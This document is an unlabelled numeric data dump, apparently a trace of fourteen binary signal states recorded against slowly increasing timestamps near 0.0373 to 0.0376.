1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335308e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335336e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335360e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335412e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335436e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335460e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335536e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335560e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335612e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335636e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335660e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335736e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335760e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335812e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335836e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335860e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335884e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335908e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335936e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335960e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336012e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336036e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336060e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336136e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336212e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336236e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336260e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336288e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336312e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336412e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336436e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336460e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336488e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336512e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336612e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336636e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336660e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336688e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336712e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336812e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336836e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336860e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336888e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336912e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7336964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7336988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7337016e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7337040e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7337068e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7462036e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7462212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.7462216e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462236e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,3.7462264e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462288e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7462608e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462636e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7462660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7462708e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7462756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462784e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7462808e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7462836e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7462860e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7462868e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7462884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7462908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7462932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7462956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7462984e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463008e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463032e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463060e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463084e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463184e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463208e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463232e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463260e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463284e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463308e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463408e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463436e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463608e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463636e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463660e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463708e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463732e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463756e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463780e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463808e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463832e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463880e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7463956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7463980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464008e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464032e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464060e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464080e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464108e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464132e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464184e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464208e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464232e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464260e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464284e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464308e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464436e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464460e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464508e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464532e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464584e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464608e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464660e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464684e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464808e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464836e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464860e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464884e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464932e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7464956e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7464980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465008e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465032e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465060e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465084e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465108e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465140e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465164e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465188e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465216e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465240e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465268e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465292e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465316e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465340e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465364e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465388e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465416e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465440e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465468e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465492e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465516e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465540e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465564e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465588e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465616e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465640e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465668e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465692e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465716e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465740e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465792e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465816e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465840e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465868e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465892e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465916e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465944e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7465968e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7465996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466020e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466044e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466068e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466092e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466116e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466144e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466168e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466196e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466220e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466244e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466268e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466292e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466316e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466344e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466368e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466392e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466420e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466444e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466468e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466492e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466516e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466544e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466568e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466596e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466620e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466644e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466668e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466692e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466716e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466744e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466768e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466820e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466844e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466868e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466892e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466916e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466944e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7466968e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7466996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467020e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467044e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467068e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467092e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467116e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467140e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467168e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467196e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467220e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467244e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467268e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467292e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467316e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467344e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467368e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467396e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467420e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467444e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467468e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467492e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467516e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467544e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467568e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467588e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467620e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467644e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467668e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467692e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467716e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467740e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467764e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467788e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467816e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467844e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467868e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467892e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467916e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467940e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7467964e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7467988e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468016e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468044e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468068e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468092e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468116e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468140e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468164e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468188e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468216e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468244e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468268e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468292e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468316e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468340e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468364e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468388e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468416e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468444e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468468e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468492e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468516e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468540e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468564e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468588e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468620e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468644e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468668e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468692e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468716e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468744e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468768e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468820e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468844e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468868e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468892e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468916e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468944e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7468968e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7468996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7469020e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7469044e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7469068e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7469092e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7469116e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7469144e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7469168e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7469196e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7469220e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,3.7593940e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.7594152e-02 1,0,1,1,0,1,0,0,0,1,0,1,0,1,3.7594180e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.7594204e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,1,3.7594524e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.7594548e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7594556e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7594572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7594596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7594624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7594648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7594676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7594700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.7594724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.7594748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7594772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7594796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7594824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7594848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7594876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7594900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7594924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7594948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595000e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595024e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7595028e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7595076e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7595100e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595108e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595596e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7595604e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7595652e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7595676e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,3.7595680e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595684e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595824e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595848e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7595972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7595996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596024e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596124e-02 